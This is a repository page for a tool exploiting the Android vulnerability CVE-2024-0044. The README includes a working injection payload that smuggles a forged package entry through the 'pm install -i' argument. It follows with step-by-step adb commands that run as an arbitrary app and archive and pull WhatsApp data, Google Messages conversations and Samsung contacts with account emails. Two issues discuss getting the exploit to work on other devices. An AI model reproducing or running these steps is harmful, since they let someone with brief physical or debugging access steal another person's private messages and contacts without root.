Git Product home page Git Product logo

cve_2024_0044's Introduction

CVE 2024 0044

CVE-2024-0044, identified in the createSessionInternal function of the PackageInstallerService.java file, is a high-severity vulnerability affecting Android versions 12 and 13. This vulnerability allows an attacker to perform a "run-as any app" attack, leading to local escalation of privilege without requiring user interaction.The issue arises due to improper input validation within the createSessionInternal function. An attacker can exploit this by manipulating the session creation process, potentially gaining unauthorized access to sensitive data and performing unauthorized actions on the affected device​

The exploit was discovered by Meta security

The proof of concept was summarised and shared by Tiny hack

Details about the security patch can be found at Android security bulletin

Prerequisites

  1. Enable USB debugging in your mobile phone and connect it to your machine using a usb cable or wireless debugging
  2. Download any apk to your machine you can use F-DROID

How to use the tool

python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P is used to specify the target package name you want to run as

-A to specify the apk file to push in the device

Exploitation

Run the tool python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

A payload.txt file like this will be generated

PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

The tool automates some parts and other parts are manual. You can exit after generating the payload and run all the commands manually or you can continue with the instructions

Next you'll need to connect to your device using adb shell and paste in the payload and make sure you get a Success message back after the last command

pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

Next we get the whatsapp data using the following commands

pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

Create a temporary directory: mkdir /data/local/tmp/wa/

Create a placeholder for a tar file: touch /data/local/tmp/wa/wa.tar

Set wide-open permissions: chmod -R 0777 /data/local/tmp/wa/ to ensure any user can read, write, and execute within this directory.

Switch user context: run-as victim to gain the same permissions as the "victim" user.

Archive the target application's data: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp, creating a tarball of the WhatsApp data directory.

Finally pull the data

adb pull /data/local/tmp/wa/wa.tar

You can extract the data using 7z or any other tool

You can use Whatsapp chat exporter to convert it to HTML

This allows you to get whatsapp data without a root access on your device

Pulling google messages

Just change the package name as follows

plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Down
loads/F-Droid.apk

Follow the above instructions and after pulling the wa.tar file untar it and open the conversations in com.google.android.apps.messaging/databases/bugle_db using sqlitebrowser or any other tool

Pulling contacts

Tested for samsung device. For other devices check the package name for the contacts provider.

plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk

Follow the above instructions and after pulling the wa.tar file untar it and open the contacts in com.samsung.android.providers.contacts/databases/contacts2.db using sqlitebrowser or any other tool. The db file contains all the user email accounts info with the contacts list

cve_2024_0044's People

Contributors

pl4int3xt avatar

Stargazers

avatar avatar LawlessCarrot avatar avatar Vinayak avatar avatar Devarajan avatar avatar nux avatar avatar Manoj Naik avatar Sirichai Chulee avatar avatar avatar xi4oyu avatar Alol avatar ZERO-A-ONE avatar V4kst1z avatar avatar avatar avatar Evvil avatar Lnyan avatar avatar YOLOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO avatar 宿命 avatar CaRryKinGo avatar avatar Mustafa Ismail avatar swagkarna avatar Hak-Init avatar Rohan Das avatar avatar avatar Mr.X avatar avatar Resery avatar Liangzhihao avatar avatar avatar avatar avatar DaRkHeArTz avatar s1nk avatar avatar avatar Ramazan Akbal avatar Max avatar avatar lvyzh avatar Choas01 avatar avatar Alessandro avatar aweNousaku avatar JNZ avatar Ayele avatar avatar ⭐ 🐾 avatar Tolya Korniltsev avatar Samartha J V avatar Anthy avatar ' avatar hikki avatar Subho Halder avatar Matteo avatar SsageParuders avatar Tim Strazzere avatar Sane avatar avatar Sndav Bai avatar LSA avatar Kira233 avatar avatar Ecool avatar d0gkiller87 avatar Tr0e avatar avatar Hutt0n0 avatar SeeFlowerX avatar Cynosure avatar avatar avatar StriveMario avatar Manuel Mancera avatar Bruce Felix avatar avatar avatar avatar Vantablack avatar wased avatar yichen avatar yanq avatar avatar avatar Yang2635 avatar socooker avatar avatar avatar Sanyic avatar oiwgeheigwehhioweg avatar

Watchers

Choas01 avatar avatar avatar Khakai avatar avatar

Forkers

dayideal ntkscnzv itprototype mrxoder ro0tmylove satriaadhipradana crackercat ads38 jdragons k4mu5 norwloading thebear90 zabeliqbal zeropart phuong39 xqq524148626 xxroot corner514 google-mirror 0x00000003 cofface xbl2022 hackmogador justjashu heyholiday067 axhlzy ckandroidproject baptistapedro vaginessa lzh110686 cutff xyxdaily xuuhaoo hackerspot2001 mohitkoley saitp hutashan14 n0m4df4ll3n swagkarna cavesave nak000 sameerlike141 jimmychanii

cve_2024_0044's Issues

TAR file corruption

The downloaded tar file prompts that it has been corrupted, and the data in tar is not all
image

Run-as doesn't seem work on realme/oppo devices

I have tried on the Realme/Oppo devices, but it is returning this error.

RE879EL1:/ $ run-as victim
run-as: unknown package: victim

I looked into the /data/system/packages.list file, I found that the victim entry is not there (somehow it is getting trimmed out).
How to resolve this?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.